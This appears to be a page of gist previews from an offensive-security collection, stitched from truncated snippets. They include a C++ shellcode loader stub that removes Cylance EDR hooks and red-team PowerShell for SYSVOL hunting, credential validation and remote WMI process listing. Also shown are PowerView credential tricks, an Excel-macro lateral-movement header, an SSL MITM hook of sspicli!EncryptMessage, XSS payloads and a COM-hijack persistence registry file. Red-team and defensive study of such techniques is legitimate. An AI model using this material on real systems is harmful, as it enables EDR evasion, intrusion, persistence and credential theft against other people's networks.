#include <iostream>
#include <windows.h>
// Byte buffer for the payload; the string literal is only a placeholder and the
// preview ends before buf is referenced anywhere.
unsigned char buf[] =
"SHELLCODE_GOES_HERE";
// Record presumably used to pick per-Windows-version values; only the
// osVersion field is declared in this preview, so its use is not visible here.
struct syscall_table {
int osVersion; // Windows version the entry applies to — TODO confirm encoding (build number vs. enum)
};
// Remove Cylance hook from DLL export
void removeCylanceHook(const char *dll, const char *apiName, char code) {
DWORD old, newOld;
qgrosperrin / misc-cheat-sheet.ps1
Last active July 11, 2020 10:52
Handy commands for Red Team engagements
# Hunting files on domain controllers:
# Both lines walk SYSVOL recursively over SMB. Note that -match is a regex test, so
# ".vbs" means "any character followed by vbs" and also matches names such as "foo_vbs.txt".
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".vbs"}
powerpick gci -path \\<DC-hostname>\SYSVOL\<fqdn>\ -Recurse | ? {$_.name -match ".exe"}
# Validating password
# ValidateCredentials performs a real logon attempt against <DC-hostname> with the supplied
# username/password. NOTE(review): expect each call to show up in that DC's authentication
# audit log like any other logon — confirm against the audit policy in use.
powerpick Add-Type -AssemblyName System.DirectoryServices.AccountManagement;$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain;$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, '<DC-hostname>');$principalContext.ValidateCredentials('<username>', '<password>')
# Curated output for listing processes (WMI)
powerpick $Password = ConvertTo-SecureString "<password>" -asplaintext -force; $Credential = New-Object -Typename System.Management.Automation.PSCredential -ArgumentList "<DOMAIN\username>",$Password;Get-WMIObject Win32_Process -computername <target-hostname> -Credential $Credential| ?{$_.GetOwner().User -NotLike 'SYSTEM' -and $_.GetOwner().User -NotLike "*SERVICE"} | select ProcessID,Name,@{n
qgrosperrin / PowerView-3.0-tricks.ps1
Last active July 18, 2019 14:45
PowerView-3.0 tips and tricks (updated from harmj0y's version)
# get all the groups a user is effectively a member of, 'recursing up' using tokenGroups
Get-DomainGroup -MemberIdentity <User/Group>
# get all the effective members of a group, 'recursing down'
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
# use an alternate credential for any function
# 'TESTLAB\dfm.a' / 'BurgerBurgerBurger!' are presumably example values carried over from
# the original write-up — replace them. A password passed as plaintext on the command line
# is retained in PowerShell history/transcripts and process command-line logging.
$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force; $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword); Get-DomainUser -Credential $Cred
# retrieve all the computer dns host names a GPP password applies to
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
qgrosperrin / memMITM.cpp
Created December 19, 2017 10:09
SSL MITM PoC - Hook sspicli!EncryptMessage
#define SECURITY_WIN32 //Define First Before Imports.
#include <windows.h>
#include <stdio.h>
#include <Sspi.h> //Be sure to reference secur32.lib in Linker | Input | Additional Dependencies
FARPROC fpEncryptMessage; // Pointer To The Original Location (resolved address of sspicli!EncryptMessage — TODO confirm where it is assigned; not visible in this preview)
BYTE bSavedByte; // Saved Byte Overwritten by 0xCC (0xCC is the x86 int3 breakpoint opcode); its restore path is outside this preview
qgrosperrin / xor.py
Created December 18, 2017 10:00 — forked from revolunet/xor.py
Simple python XOR encrypt/decrypt
#
# NB: this is not secure — a repeating-keyword XOR gives no real confidentiality and should be treated as obfuscation only
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/
# added base64 encoding for simple querystring :)
#
def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False):
from itertools import izip, cycle
import base64
if decode:
qgrosperrin / regLoad.js
Created October 31, 2017 15:36
Create & Enumerate All COM Objects (by subTee)
// Constant for HKEY_CLASSES_ROOT (0x80000000), matching the name HKCR and the
// VBScript hive table below; HKEY_LOCAL_MACHINE would be 0x80000002.
var HKCR = 0x80000000;
/*
Const HKCR = &H80000000 'HKEY_CLASSES_ROOT
Const HKCU = &H80000001 'HKEY_CURRENT_USER
Const HKLM = &H80000002 'HKEY_LOCAL_MACHINE
Const HKU = &H80000003 'HKEY_USERS
Const HKCC = &H80000005 'HKEY_CURRENT_CONFIG
*/
''">
”><script>alert(“X”)</script>
’><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
' '><script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
<script>alert(1)</script>
"><script>alert(1)</script>
Windows Registry Editor Version 5.00
; Per-user COM server registration. InProcServer32 under HKCU\Software\Classes is consulted
; ahead of the machine-wide entry for the same CLSID, so this makes COM load the DLL named
; below whenever that class is instantiated, and it needs no administrative rights to write.
; From a defender's view, writes to HKCU ...\CLSID\{...}\InProcServer32 are a well-known
; COM hijack/persistence indicator worth monitoring.
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32]
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll"